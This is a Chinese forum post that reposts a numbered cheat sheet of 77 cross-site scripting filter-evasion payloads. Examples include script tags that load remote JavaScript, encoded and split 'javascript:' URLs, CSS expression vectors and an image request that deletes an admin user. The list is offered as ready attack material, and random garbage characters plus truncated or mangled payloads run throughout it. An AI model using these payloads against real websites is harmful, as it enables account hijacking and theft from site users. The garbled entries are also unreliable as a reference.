貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。$ `- U& L O$ X& |5 t$ L
7 C' E# o) @3 |( J$ e" Q* L (1)普通的XSS JavaScript注入% r. b7 c3 h- Y1 T9 b
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>4 g7 N6 i4 `( ^+ J. U
# h7 _$ [3 I- X- T* m (2)IMG标签XSS使用JavaScript命令7 J& P" p2 W+ y7 g
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( R, L6 c* M3 N3 H4 R/ C, t1 r* x9 `7 r6 |/ I5 Z
(3)IMG标签无分号无引号6 W& a. C1 u c7 t5 K% b# ^* g& H
<IMG SRC=javascript:alert(‘XSS’)>
! h0 q- S; s/ H
4 `( H) L/ \ V- h2 r8 L) c0 Z. Q (4)IMG标签大小写不敏感; j7 `2 w+ ?4 i* Q: U3 `; V& {
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
$ D: |- B; A* T5 j. W# ?9 p; g' l% g2 a9 V4 M
(5)HTML编码(必须有分号)
' r. N3 w: n; d* ]7 e <IMG SRC=javascript:alert(“XSS”)>
: c/ W! O9 H' o) x7 U' r" \3 Q$ K; U/ X9 }9 @5 b
(6)修正缺陷IMG标签
2 ]9 G" G9 t& ]% A$ ] <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
M7 s" q* W W/ u
7 q- y3 c" O! v2 e% j8 ~1 ~ (7)formCharCode标签(计算器)
" B- n, e v+ x$ k6 C- H- j <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
. u% ]8 ?. T7 g- z5 k) q
$ S+ O* e7 j& J* o (8)UTF-8的Unicode编码(计算器)
5 O/ }5 k# g! S7 z0 T/ { X# } <IMG SRC=jav..省略..S')>$ K2 p, I9 g5 {3 Z) W! f
9 ?1 e6 Z( Z( K- q" T; D$ p
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)4 |, \+ ?- S! D; Y7 O1 L: _' N! f: g
<IMG SRC=jav..省略..S')>* g0 w# O& ?3 k0 Z5 I; s0 a% r
/ C1 i, x8 T, R
(10)十六进制编码也是没有分号(计算器)0 }. | Y l; ^
<IMG SRC=java..省略..XSS')>: U Z0 p) C- j. z( @6 z$ q3 J
% z. n- u" x" _9 Q4 v4 M (11)嵌入式标签,将Javascript分开
7 ?7 C- y" P; y <IMG SRC=”jav ascript:alert(‘XSS’);”>
3 P4 w5 ]! n; y
+ ]7 O/ h( j3 I5 G7 g8 \6 Q0 H (12)嵌入式编码标签,将Javascript分开$ U @+ w7 M* K' q
<IMG SRC=”jav ascript:alert(‘XSS’);”>4 t8 E& R- ~; q0 J0 Y0 q
+ H. [( @# G/ r7 m) p (13)嵌入式换行符
' }/ }0 Y$ Z6 v5 y' z" } <IMG SRC=”jav ascript:alert(‘XSS’);”>
: @8 T8 E. y5 a/ y7 f5 I6 E2 ?7 E% T* y
(14)嵌入式回车
9 n1 k# z% ~2 g P <IMG SRC=”jav ascript:alert(‘XSS’);”>
; r. ~$ @0 Z* @' j2 |
8 f, W# c5 ^9 Z1 m! u& ]! w# [7 ] (15)嵌入式多行注入JavaScript,这是XSS极端的例子
6 W, z0 a3 d5 u; A1 a <IMG SRC=”javascript:alert(‘XSS‘)”>
; t L, f- O) S, O3 Z7 o
3 z( g' ?/ z% p8 j (16)解决限制字符(要求同页面)
- w0 G' ^# k& m2 }! m <script>z=’document.’</script>
F( J$ E; x5 w0 D- e/ D <script>z=z+’write(“‘</script>
8 d$ L& C: e; o <script>z=z+’<script’</script>* a6 y* B) N% c
<script>z=z+’ src=ht’</script>3 L8 G6 K" R1 M z; y
<script>z=z+’tp://ww’</script>$ g+ V* b3 N, ^5 U$ R
<script>z=z+’w.shell’</script>* H1 Q0 ?- j$ j# S/ V0 s& X
<script>z=z+’.net/1.’</script>% F- V7 s* X% ]" p
<script>z=z+’js></sc’</script>, r- d* i% O2 h$ N* A) R. D
<script>z=z+’ript>”)’</script>
# @: Y4 Q& R: v2 H& a% r. m6 l <script>eval_r(z)</script>
. ~; h: ~0 ]& ]& c4 }8 ~
4 Q# R& m0 U8 d' T- s (17)空字符
3 w$ @, r6 T3 N" X' O/ X perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
! q' V, t$ B( a8 @9 O, Z% N" C2 s4 J& |: w
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用0 o- W; `" s2 ]- C: }3 M
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
3 f" j- @2 n- S6 H* Y8 Q8 O% E- g
4 y+ r3 W9 n& { (19)Spaces和meta前的IMG标签
' K9 {' y6 {4 \# d0 V <IMG SRC=” javascript:alert(‘XSS’);”>4 u# j1 v# v' y4 e* E1 p
9 l9 a! d" {! H. V6 g! D (20)Non-alpha-non-digit XSS
/ b. E! P) C+ I. V7 X5 f3 p! o <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>5 f/ t- e @) g- u5 Y, N
& R+ z* X2 d$ }6 L/ P/ C (21)Non-alpha-non-digit XSS to 2+ P/ L8 Q; U2 \" C
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>: w5 ^1 w; k* K# w
8 K( p: S9 o" D# l7 X
(22)Non-alpha-non-digit XSS to 3. T8 [! |$ |4 N ~+ L8 v ?
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
5 S" r3 c( s- o$ x: b4 U' s# e. \& [ U
(23)双开括号
2 U0 P: [* @, n" I. a& W# ]- u& @, o <<SCRIPT>alert(“XSS”);//<</SCRIPT>
* f3 z9 z& o4 c2 W3 W# t
% D% b* M, v2 a" G2 }# D$ f8 J (24)无结束脚本标记(仅火狐等浏览器)
5 I# F3 Q8 j' g <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
' p5 Z7 X% N$ ~6 e
% @% v0 k, J1 Z2 ^ (25)无结束脚本标记24 ?! }5 _6 M+ G5 u
<SCRIPT SRC=//3w.org/XSS/xss.js>6 ]6 C: r; E# O3 c
+ m) N! m7 j& P, I (26)半开的HTML/JavaScript XSS
, }! T. x* v0 I% H/ \2 ]2 R/ c <IMG SRC=”javascript:alert(‘XSS’)”
! {9 G1 r& q) i& q5 M; U6 V0 U& x1 Q& \5 V+ G# e
(27)双开角括号! T+ L: e: S( w* ?
<iframe src=http://3w.org/XSS.html <. @+ ~% V3 r+ A4 q
~3 [6 L# ?( @2 r3 Q; x" W
(28)无单引号 双引号 分号% h" p, D7 Z: M: H0 L( K
<SCRIPT>a=/XSS/, e+ r$ `( G3 K3 j" N6 t& \; z
alert(a.source)</SCRIPT>0 _$ b& K5 e: [
! d; |0 G$ w+ B' _( g8 w5 p (29)换码过滤的JavaScript
+ l& _4 A) [2 E1 ?& G9 c# e5 f5 k \”;alert(‘XSS’);//
1 ~7 K. Q) G/ B3 i/ H7 e! a9 r# A8 K C- @+ u* m3 z% H+ ]; M% w1 ]6 U
(30)结束Title标签
* h) w! M1 e1 ~+ W/ n8 x% K </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
( y5 V w) c( o- I0 L/ k. O5 R
/ k: W$ ^ S" X# M+ n( R (31)Input Image
7 Q) l$ M, g6 ? <INPUT SRC=”javascript:alert(‘XSS’);”>" ^1 B7 D- ^ S. K/ p- F/ H, G
9 H: G; F1 v' } (32)BODY Image, L5 \$ E: D+ o& e0 R9 o
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 F4 ~4 U# T$ e4 K, b) Z( N% i8 `: A+ D: L" ]% }
(33)BODY标签0 z- S/ r f$ E* }% P2 I# d
<BODY(‘XSS’)>
% C* x/ \0 ^7 ^7 `
3 I) ~1 |, D& q/ O0 ?* R% n (34)IMG Dynsrc
; S- j' M+ h7 r7 n! b U" ` <IMG DYNSRC=”javascript:alert(‘XSS’)”>
9 H1 [5 D7 G' f6 j0 Z W% m
5 t" b0 _; Z4 p+ T: w! q5 Z (35)IMG Lowsrc( M# w. Z3 ?3 Q( G
<IMG LOWSRC=”javascript:alert(‘XSS’)”>8 ?" a& `* [8 Y% u$ j
?+ r! ?( I5 Q- j; H9 B' s (36)BGSOUND$ }, t7 ]3 A2 M4 H# R& I& {. A' x
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
& h0 h$ o: N, L/ z5 X
: | [- \: s9 K0 b" e- n& I (37)STYLE sheet0 z8 r. U) m, O" Q5 ?* b; D
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
; A V3 I8 `2 }! H' g5 j6 h- v. F, K' c: u0 h2 d
(38)远程样式表
5 G+ m ?6 A p% X$ B3 ? <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
5 F5 m3 T$ w$ {* U! |2 T
8 i* B$ }- a# D$ [7 `! P! W: k (39)List-style-image(列表式)' e! [, n1 D3 {3 `* U" g
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
/ B4 {6 r; }9 J3 c a* V; p' Q* m
7 f- r/ T; T! @# d7 m/ S5 K1 |* D: j (40)IMG VBscript
1 d5 X7 ^, [; e( [4 k <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
! H( A% f8 |, L+ H) o+ C" t/ a; m, d: o' I
(41)META链接url1 L5 O C3 A* v) k+ a! ^4 c3 o
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
3 T% Y/ r' C* D \* d7 b
) L) ?% X% D6 E# Q' ` (42)Iframe
/ C' p5 W: s: K <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
' m* b. x& L8 G# ], S1 F
0 d0 o5 U! E6 W F/ s+ h (43)Frame4 s$ Q. {" K" O( i; ~: B
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
) u! X' m# q, l |) l4 |3 G( l" g8 w( m3 r
(44)Table
, D6 @6 v/ ^% l2 Q* W# G' u9 F <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>) q/ w8 h* l9 Y; f
" y" R7 f8 { j8 Z- W+ G
(45)TD, |" n- B' r0 D1 z" a
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
4 A F! r! l; U% O+ a+ W! I% j# C8 M0 L2 P' m% d) R& A- ]" L2 ^
(46)DIV background-image
/ ]' {) D0 x/ n <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' O! A: ~$ _6 V! y I; v" g' }
) B6 ~0 b4 D0 O3 D8 }' T5 }
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
1 Z( k9 `4 z7 M, G <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
+ H$ b" R- H$ c6 e" R; M# T# v/ w4 l$ h; Y* x* [$ a: j: R7 H
(48)DIV expression
7 a/ j+ A2 u |! R6 [' D <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
, H% e1 e3 v/ k9 O6 w! \" O# \& m# i1 g1 @) A( O% n3 `# L
(49)STYLE属性分拆表达
: Q+ l, O0 n% Q5 \9 r# [ <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>7 T* y: j7 {- _1 J% n4 j* x
& y, S; { J# G6 M
(50)匿名STYLE(组成:开角号和一个字母开头) p" Q7 I# x' X# r7 u, R
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
# e) n* ~0 ^# b9 K y" \& t$ ~
2 i; C |' {7 J (51)STYLE background-image+ S3 R' [5 @- B: y4 A! H( N& e
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>3 j, q$ O S: X" H" L) y; R3 N7 H9 ?
8 J0 p- h; s% q3 n7 { (52)IMG STYLE方式0 [9 \) d, r0 y0 X! j2 B
exppression(alert(“XSS”))’>
- L4 o- R8 `. U) U1 e; C& [! p4 S0 i
: w- B8 L6 @( S (53)STYLE background
+ k* {$ m/ i( }5 P <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
9 |5 ?3 I: z! i- Q; d# {# D2 N& f( z8 L# Y* `) L
(54)BASE
I3 ~: o) T i2 }" r9 y <BASE HREF=”javascript:alert(‘XSS’);//”>
5 Y; L, y8 v) ?. v" T' i! x' u* Y ~1 K' M5 X _( B
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS+ o' z1 U' f: S5 g$ Q0 I
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
* X3 r: d n! m2 H
* V6 I4 ?) v$ s (56)在flash中使用ActionScrpt可以混进你XSS的代码
, b0 Z9 ]6 G8 ^4 ] a=”get”;
6 Q, b* p5 r& \1 s5 k1 t b=”URL(\”";$ I& h+ W% O/ P7 ^) x
c=”javascript:”;
: N; t0 |* z7 F$ G7 v+ ~/ R* b d=”alert(‘XSS’);\”)”;
9 } L" g3 O u$ V' a; ^ eval_r(a+b+c+d);
8 R0 c" l: {$ M8 t+ g0 b9 R% o4 V( n
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
a% T0 c6 X2 l <HTML xmlns:xss>
( d% i) ^, I" X' `: {4 x1 U( s <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
) J, P6 H# F+ A% c8 a% { <xss:xss>XSS</xss:xss>
+ o; X- ?# \( Z: B9 y </HTML>+ q. Y1 ~% v6 b# ]1 J
: B# |0 j) e! T" j
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用$ y" M* p% r! u0 J6 E8 Z
<SCRIPT SRC=””></SCRIPT>
* w' z$ L+ U+ a% o+ j
4 R& e+ p5 x4 T" ]/ } (59)IMG嵌入式命令,可执行任意命令
+ W7 r& i! q. l3 c( n <IMG SRC=”http://www.XXX.com/a.php?a=b”>
e& w# O# d( e; K! l$ v- R a) n; _
(60)IMG嵌入式命令(a.jpg在同服务器)* `9 F b% W9 J0 V; ~
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser, D. ~7 v# l; ~+ v* u" @
* U6 ~/ l' o# L/ B8 m3 n8 s$ T3 F (61)绕符号过滤7 L( b: W, s8 _
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
* [6 @- P( }" W( ]- q
9 a& z4 Y$ ?3 }2 a! \ (62)
5 o z8 K" U! t5 G% n1 H0 @ G <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 B+ G+ }2 Y. A2 d( k$ E8 Y4 K l8 e
/ l( \5 ]( S* H# ]# P (63)$ [6 W' s% n% ]- {$ i
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
M- |' F8 t! B7 J! `6 K+ N% K& y9 ^ G( a8 U$ l2 ?; A( K
(64)5 Y1 I/ o# H' f+ o
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
. }- ]7 J/ P- Z
W7 M) _2 h# W3 a3 y8 g (65)
9 v* W0 G3 y. x+ i2 U: a <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
% H1 ]* n2 ~) W2 f# k8 G2 D% R
: X& W$ a S* e( ] (66)% u5 x6 P) h' ^2 ?# y6 f) ]
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>! k% _% |- p. g' |7 P' d3 X
9 |7 p( |& u9 K* k: o# L
(67)3 g7 q0 j+ g2 D2 q& C
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
! l" ^5 Z2 j% A% x+ O1 E/ j h2 k$ q0 _
(68)URL绕行# t' a4 G0 f/ g; i
<A HREF=”http://127.0.0.1/”>XSS</A>
9 \3 d' v3 e- S% S+ t3 J
h, G6 D8 u9 c& p* q% \2 C) H, T# O0 f+ F (69)URL编码
) {2 k0 C" U, ]) U" V, I <A HREF=”http://3w.org”>XSS</A>
3 H" x8 V9 t/ }! l0 V, N+ [. M
: p6 z4 V: ~5 V4 H2 d (70)IP十进制
3 w& `) A! \7 J- F* j( V <A HREF=”http://3232235521″>XSS</A>
8 V7 k1 O. r. C5 K+ h9 J
+ q/ U' y3 ?2 } (71)IP十六进制! o: L2 Z6 P' v! e9 P3 o7 x, r
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
: i) a; }1 X, O. a0 v' j1 ?! Y9 T" q# A7 F
(72)IP八进制2 f* g" l" W) M4 a: K8 l
<A HREF=”http://0300.0250.0000.0001″>XSS</A>( B J/ P, x$ v. b
9 e( |3 i/ T' b (73)混合编码
& D/ f/ b. m n <A HREF=”h/ }- i- A9 `( Q( C) ?# P/ p7 l
tt p://6 6.000146.0×7.147/”">XSS</A>
7 l, b) \# Z+ T4 j1 i0 ~5 j5 \0 M( z9 b, p5 [- @
(74)节省[http:]8 h! R" q; p% R
<A HREF=”//www.google.com/”>XSS</A>
3 f$ z2 r# q) v# Q. Q( B2 A% Z ~7 T0 u
(75)节省[www]
- `9 A6 c. x: Z, A5 B; _ <A HREF=”http://google.com/”>XSS</A>
- _3 r" m5 T: A0 a, s, g: z2 _6 R" |) T
(76)绝对点绝对DNS/ q \4 O* z+ R8 P
<A HREF=”http://www.google.com./”>XSS</A>1 K9 _. b, B! G( o
8 f! C* f& T8 O: _1 q; B2 G
(77)javascript链接
1 ]: h( Y; ]9 s- j- Y" U" x <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |